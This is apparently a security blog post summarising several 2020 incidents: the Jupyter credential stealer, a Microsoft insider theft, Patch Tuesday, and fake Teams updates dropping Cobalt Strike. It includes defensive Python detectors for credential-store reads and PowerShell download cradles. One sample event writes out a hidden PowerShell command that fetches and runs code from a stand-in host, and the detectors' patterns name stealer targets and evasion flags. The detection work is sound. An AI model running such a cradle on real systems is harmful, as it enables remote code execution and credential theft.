hexway cybersecurity blog brings you the latest news about attacks and data breaches, emerging malware, and vendor security updates with comments from our experts
News for discussion
New Jupyter malware steals credentials from Chrome, Firefox, and Chromium
The Jupyter Trojan is used to steal usernames, passwords, and other sensitive data and to plant a persistent backdoor on compromised systems. It was first detected on the network of a US university in May 2020. Jupyter goes primarily after browser data from Chrome, Firefox, and Chromium. The installer is delivered as a zipped file, often with an MS Office icon or a filename that suggests it must be opened urgently. Once run, it installs legitimate tools to cover its downloads and drops the malware into the compromised system's temporary folders in the background. Once installed, it begins harvesting data of various kinds: usernames, passwords, browser autofill data, browsing history, and cookies, and exfiltrates it to its command-and-control (C2) server.
It was 2020, and users were still launching attachments from suspicious emails and installing malware on their computers.
As our own phishing campaigns show (run as part of red team engagements, for example), even users who have recently completed security awareness training still click suspicious links and open unfamiliar files from attachments.
So training is undoubtedly beneficial, but without technical measures it is of little use. Administrators must configure mail filtering and antivirus, and restrict user privileges so that an attachment that does get launched cannot do much.
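One technical measure that catches exactly what Jupyter does: put a SACL on the browser credential stores and alert when anything other than the browser reads them. The detector below is an added example for this post, not hexway's or any vendor's tooling. It assumes Windows object-access auditing is enabled so that each read appears as a Security event 4663; the event records, the dropper name and the profile path are constructed for the example, not taken from a real host.

```python
"""Flag non-browser processes reading browser credential stores.

Added example for this post, not hexway's or any vendor's tooling.
Assumptions: Windows object-access auditing is enabled and SACLs are set on
the browser files below, so each read lands as a Security event 4663; the
event records here are constructed for the example, not captured from a host.
"""
import re

# Files an info stealer like Jupyter goes after (browser default locations;
# Firefox profile directory names vary, hence the wildcard segment).
CREDENTIAL_STORES = [
    r".*\\Google\\Chrome\\User Data\\.*\\(Login Data|Cookies|Web Data|History)$",
    r".*\\Chromium\\User Data\\.*\\(Login Data|Cookies|Web Data|History)$",
    r".*\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(logins\.json|key4\.db|cookies\.sqlite|places\.sqlite)$",
]
STORE_RE = re.compile("|".join(f"(?:{p})" for p in CREDENTIAL_STORES), re.IGNORECASE)

# The only processes expected to open these files. Extend per environment
# (backup agents, EDR) rather than loosening the rule.
BROWSER_OWNERS = {"chrome.exe", "chromium.exe", "firefox.exe"}


def is_suspicious(event: dict) -> bool:
    """True when a 4663 event shows a non-browser process reading a store."""
    if event.get("EventID") != 4663:
        return False
    if not STORE_RE.match(event.get("ObjectName", "")):
        return False
    # 'Accesses' is the 4663 access-mask text; copying a file needs ReadData,
    # so attribute-only touches (indexers, scanners) are ignored here.
    if "ReadData" not in event.get("Accesses", ""):
        return False
    proc = event.get("ProcessName", "").rsplit("\\", 1)[-1].lower()
    return proc not in BROWSER_OWNERS


def find_theft(events: list) -> list:
    """Return the events worth raising to an analyst."""
    return [e for e in events if is_suspicious(e)]


# Constructed sample events (not from a real host); the dropper name is hypothetical.
CHROME_LOGINS = r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"
FIREFOX_LOGINS = r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\k3x9q1zz.default-release\logins.json"
DROPPER = r"C:\Users\alice\AppData\Local\Temp\WindowsUpdateService.exe"

SAMPLE_EVENTS = [
    {"EventID": 4663, "ProcessName": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ObjectName": CHROME_LOGINS, "Accesses": "ReadData (or ListDirectory)"},
    {"EventID": 4663, "ProcessName": DROPPER,
     "ObjectName": CHROME_LOGINS, "Accesses": "ReadData (or ListDirectory)"},
    {"EventID": 4663, "ProcessName": DROPPER,
     "ObjectName": FIREFOX_LOGINS, "Accesses": "ReadData (or ListDirectory)"},
    {"EventID": 4663, "ProcessName": r"C:\Windows\explorer.exe",
     "ObjectName": r"C:\Users\alice\Documents\notes.txt", "Accesses": "ReadData (or ListDirectory)"},
    {"EventID": 4663, "ProcessName": r"C:\Program Files\BackupAgent\agent.exe",
     "ObjectName": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies",
     "Accesses": "ReadAttributes"},
]

if __name__ == "__main__":
    for hit in find_theft(SAMPLE_EVENTS):
        print(f"ALERT: {hit['ProcessName']} read {hit['ObjectName']}")
```

Two of the five constructed events fire: the Temp-resident dropper reading the Chrome and Firefox login stores. The browser's own reads and the backup agent's attribute-only access stay quiet. Real deployments need an allowlist of legitimate readers (backup, EDR, password-manager import tools), and the SACL must be applied to every user profile, which is a GPO or logon-script job rather than a one-off.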
Microsoft engineer stole $10 million worth of gift cards, gets 9 years of prison
In the summer of 2019, US authorities brought charges against a former Microsoft employee, Ukrainian citizen Vladimir Kvashuk, for stealing about $10 million from the company. Kvashuk worked at Microsoft from 2016 to 2018. He abused Microsoft's online retail testing program to steal "currency stored value", in effect gift card codes, and resold them online. To cover his tracks, he ran the proceeds through cryptocurrency mixing services before they reached his bank and investment accounts. This week Kvashuk was sentenced to 9 years in prison on multiple counts and ordered to pay $8.3 million in restitution.
Microsoft November 2020 Patch Tuesday
On November 10, Microsoft released its monthly security updates. They address 112 vulnerabilities across Microsoft products, 23 of which are remote code execution bugs. The release also patches a Windows kernel local privilege escalation zero-day (CVE-2020-17087) that was already being exploited in the wild. Other fixes cover Excel, Microsoft SharePoint, Microsoft Exchange Server, Windows Network File System, the Windows GDI+ component, the Windows Print Spooler service, and even Microsoft Teams.
Cobalt Strike installation disguised as Microsoft Teams updates
Ransomware operators are using malicious ads to distribute fake Microsoft Teams updates, infect systems with backdoors, and install Cobalt Strike beacons to compromise networks. In one attack, the operators bought search-engine ads so that top results for Microsoft Teams pointed to a domain under their control. Users who clicked the link downloaded a payload that ran a PowerShell script to fetch further malicious content. The payload also installed a legitimate copy of Microsoft Teams so that the victim would not suspect anything. In most cases the initial payload was the Predator the Thief info stealer. The malware also pulled down Cobalt Strike beacons, letting the attackers move laterally through the victim's network. In some attacks the final stage was ransomware that encrypted files on computers across the network.
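The tell in this chain is not the installer's location (the real Teams client also lives under the user's AppData) but what it does next: a legitimate Teams setup never spawns a hidden PowerShell that downloads and executes code from the internet. The scorer below is an added example for this post, not hexway's or any vendor's detection content; it assumes Sysmon Event ID 1 style process-creation fields (Image, ParentImage, CommandLine), and the sample events, paths and URLs are constructed, not taken from the incident described above.

```python
"""Score process-creation events for a fake-installer -> PowerShell download chain.

Added example for this post, not hexway's or any vendor's detection content.
Assumptions: Sysmon Event ID 1 style fields (Image, ParentImage, CommandLine)
are available; the sample events are constructed, not from the incident above.
"""
import re

# Where a drive-by installer from a malvertising link usually lands.
# Deliberately not all of AppData: the real Teams client also lives under
# AppData\Local\Microsoft\Teams, so the path alone proves nothing.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(Downloads|AppData\\Local\\Temp|Desktop)\\", re.I)
POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
DOWNLOAD = re.compile(
    r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|\bcurl\b|\bwget\b",
    re.I)
EXECUTE = re.compile(r"Invoke-Expression|\bIEX\b", re.I)
EVASION = re.compile(
    r"-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass|-executionpolicy\s+bypass",
    re.I)


def score_event(ev: dict) -> tuple:
    """One point per indicator; only PowerShell launches are scored."""
    reasons = []
    if not POWERSHELL.search(ev.get("Image", "")):
        return 0, reasons
    cmd = ev.get("CommandLine", "")
    parent = ev.get("ParentImage", "")
    if USER_WRITABLE.search(parent):
        reasons.append(f"launched by a binary in a user-writable path: {parent}")
    if DOWNLOAD.search(cmd):
        reasons.append("download cradle in command line")
    if EXECUTE.search(cmd):
        reasons.append("in-memory execution (IEX / Invoke-Expression)")
    if EVASION.search(cmd):
        reasons.append("hidden window, encoded command or policy bypass flags")
    return len(reasons), reasons


def triage(events: list, threshold: int = 3) -> list:
    """(score, reasons, event) for events at or above the threshold, highest first."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((score, reasons, ev))
    return sorted(hits, key=lambda t: t[0], reverse=True)


# Constructed sample events (hypothetical paths and URLs).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # Fake "Teams update" from a malvertising link: installer in Downloads
    # pulls the next stage with a hidden, in-memory PowerShell cradle.
    {"EventID": 1, "ParentImage": r"C:\Users\alice\Downloads\Teams_Setup.exe", "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')\""},
    # Legitimate Teams updater: under AppData, but it never spawns a cradle.
    {"EventID": 1, "ParentImage": r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe",
     "Image": r"C:\Users\alice\AppData\Local\Microsoft\Teams\current\Teams.exe", "CommandLine": "Teams.exe"},
    # Admin running a local inventory script: PowerShell, but no indicators.
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},
    # Deployment script fetching an internal package: one indicator, below threshold.
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": r"powershell.exe Invoke-WebRequest -Uri https://deploy.example.invalid/pkg.msi -OutFile C:\pkg.msi"},
]

if __name__ == "__main__":
    for score, reasons, ev in triage(SAMPLE_EVENTS):
        print(f"score {score}: {ev['ParentImage']} -> {ev['Image']}")
        for r in reasons:
            print("   -", r)
```

Only the constructed fake-installer event clears the threshold, with all four indicators; the real Teams updater scores nothing, and the deployment script's Invoke-WebRequest alone is not enough to page anyone. In production the parent's path check is best replaced by the file's Mark-of-the-Web and signer, and the score should feed the process tree rather than a single event so that the later Cobalt Strike beacon can be tied back to the installer that started the chain.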